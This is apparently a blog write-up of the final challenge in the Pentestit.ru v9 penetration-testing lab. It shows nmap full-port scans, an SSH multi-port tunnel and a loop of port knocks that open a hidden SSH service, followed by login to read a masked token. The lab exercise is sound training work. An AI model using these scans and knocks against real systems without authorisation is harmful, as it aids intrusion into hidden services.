Pentestit.ru V.9 (Part 14) – Token SSH-Test – Final 14/14
So the Final Chapter arrived… 😀 I’m happy to say that this was an awesome experience, and I hope this was useful for someone else also.
This Lab is coming to an end soon, and the version v10 will start, a new era, new challenges, more to learn, more to share, more difficulty’s to cross.
So, lets get to the business, shall we?
This was a painful one, I’m far far away from Russia, so doing a -Pn -p0-65535 scan take hours…
Anyway I did it and waited… xD
d.nash@tl9-ssh:~$ nmap -Pn -p 0-65535 192.168.0.7 Starting Nmap 6.00 ( http://nmap.org ) at 2016-09-22 16:16 MSK Stats: 0:02:35 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 1.17% done; ETC: 19:56 (3:37:17 remaining)
3h and 37minutes? wait all this time? It was always crashing while I waited, so I quit this challenge.
Then…One day talking with another user he told me the server have some bug, so I went to talk with an admin to request for it to be fixed, and I’m happy to say that he did a great job, fixing it in the same day. 🙂
So, after having that done, I retried the same old scan, and to my happiness and surprise:
d.nash@tl9-ssh:~$ nmap -Pn -p0-65535 192.168.0.7 Starting Nmap 6.00 ( http://nmap.org ) at 2016-10-12 21:49 MSK Nmap scan report for 192.168.0.7 Host is up (0.00065s latency). Not shown: 65532 closed ports PORT STATE SERVICE 0/tcp filtered unknown 1941/tcp filtered unknown 1970/tcp filtered unknown 2011/tcp filtered raid-cc Nmap done: 1 IP address (1 host up) scanned in 5.78 seconds d.nash@tl9-ssh:~$
Really quick, see? 😉
So we got port 0, 1941, 1970 and 2011 filtered. Strange right? :-\
We tried to nc to prot 0, and we get a diferent error than other ports.
d.nash@tl9-ssh:~$ nc 192.168.0.7 0 invalid port 0 d.nash@tl9-ssh:~$ nc 192.168.0.7 2011 (UNKNOWN) [192.168.0.7] 2011 (?) : Connection timed out d.nash@tl9-ssh:~$
After doing a sneak peak on the write-up (yes, again :-\ – My knowledge is still very limited) i understand what it is port knocking, and that it is, what is implemented here.
So, I start to do some research about port knock and how it is implemented, and got a big idea of how it works. Won’t explain it here, but you can learn it on the following link:https://www.digitalocean.com/community/tutorials/how-to-use-port-knocking-to-hide-your-ssh-daemon-from-attackers-on-ubuntu
So, we started by trying the script of the write-up but with a different change, I connected to the ssh server (the one via ssh d.nash@192.168.101.8) and from here, I run the script:
d.nash@tl9-ssh:~$ for p in 2011 1941 1970; do nmap -Pn --max-retries 0 -p $p 192.168.0.7;done Starting Nmap 6.00 ( http://nmap.org ) at 2016-10-13 13:39 MSK Warning: 192.168.0.7 giving up on port because retransmission cap hit (0). Nmap scan report for 192.168.0.7 Host is up. PORT STATE SERVICE 2011/tcp filtered raid-cc Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds Starting Nmap 6.00 ( http://nmap.org ) at 2016-10-13 13:39 MSK Warning: 192.168.0.7 giving up on port because retransmission cap hit (0). Nmap scan report for 192.168.0.7 Host is up. PORT STATE SERVICE 1941/tcp filtered unknown Nmap done: 1 IP address (1 host up) scanned in 1.10 seconds Starting Nmap 6.00 ( http://nmap.org ) at 2016-10-13 13:39 MSK Warning: 192.168.0.7 giving up on port because retransmission cap hit (0). Nmap scan report for 192.168.0.7 Host is up. PORT STATE SERVICE 1970/tcp filtered unknown Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
As you can see I run this from inside the tl9-ssh host, and on another window inside tl9-ssh host after each sequence tryout, I run the following:
d.nash@tl9-ssh:~$ nmap -Pn -p 22 192.168.0.7 Starting Nmap 6.00 ( http://nmap.org ) at 2016-10-13 13:40 MSK Nmap scan report for 192.168.0.7 Host is up (0.00038s latency). PORT STATE SERVICE 22/tcp closed ssh Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds
That is so that we can check if the port knock opened the ssh 22 port.
Guess what, after all the tryouts, it didn’t opened…
And this is were I found myself lost. I mean, why is not working? This doesn’t make sense. And the Admin told me, that everything was working as it should o_0
So, I went once again to the write-up to read it closely. And on the write-up it is mentioned a tunnel, and then the port knock is made via the tunnel, so I decided to try that.
After understand how I can make a tunnel with multiple ports, I went all-in for this process and this is what I’ve done:
Note: I’ll not post here the right sequence 😉 You can get it, I know you can 😉
So we create our tunnel:
$ sudo ssh -L 1941:192.168.0.7:1941 -L 1970:192.168.0.7:1970 -L 2011:192.168.0.7:2011 d.nash@192.168.101.8
Now just leave it open, after insert the daypass “thing”.
Now in another window you run the script:
$ for p in 1970 2011 1941; do nmap -Pn --max-retries 0 -p $p 127.0.0.1;done Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-10-13 11:49 WAT Nmap scan report for localhost (127.0.0.1) Host is up (0.00028s latency). PORT STATE SERVICE 1970/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 0.03 seconds Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-10-13 11:49 WAT Nmap scan report for localhost (127.0.0.1) Host is up (0.00024s latency). PORT STATE SERVICE 2011/tcp open raid-cc Nmap done: 1 IP address (1 host up) scanned in 0.03 seconds Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-10-13 11:49 WAT Nmap scan report for localhost (127.0.0.1) Host is up (0.00027s latency). PORT STATE SERVICE 1941/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 0.03 seconds
Notice the diferences? Now it says those ports are open… hmmm, I wonder if this means anything. Maybe yes, maybe no.
In any case, after find the correct sequence we get the port open:
d.nash@tl9-ssh:~$ nmap -Pn -p 22 192.168.0.7 Starting Nmap 6.00 ( http://nmap.org ) at 2016-10-13 13:49 MSK Nmap scan report for 192.168.0.7 Host is up (0.00030s latency). PORT STATE SERVICE 22/tcp open ssh Nmap done: 1 IP address (1 host up) scanned in 0.09 seconds
So, if port is open we just need to connect there and get our token 😛
d.nash@tl9-ssh:~$ nmap -Pn -p 22 192.168.0.7 Starting Nmap 6.00 ( http://nmap.org ) at 2016-10-13 13:54 MSK Nmap scan report for 192.168.0.7 Host is up (0.00037s latency). PORT STATE SERVICE 22/tcp open ssh Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds d.nash@tl9-ssh:~$ ssh d.nash@192.168.0.7 Linux tl9-ssh-test 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 Last login: Thu Oct 13 13:09:28 2016 from 172.16.0.2 d.nash@tl9-ssh-test:~$ ls token.txt d.nash@tl9-ssh-test:~$ cat token.txt **z**h**
Notice that after the sequence you need to be fast to check if the port is open and then connect, else it may close during that time.
And that is it… We got our Last and Final Token 😀 \o/
This was really a nice series of challenges, and an amazing LAB experience, and I would like to thanks specially to Pentestit.ru team.
Leave a Reply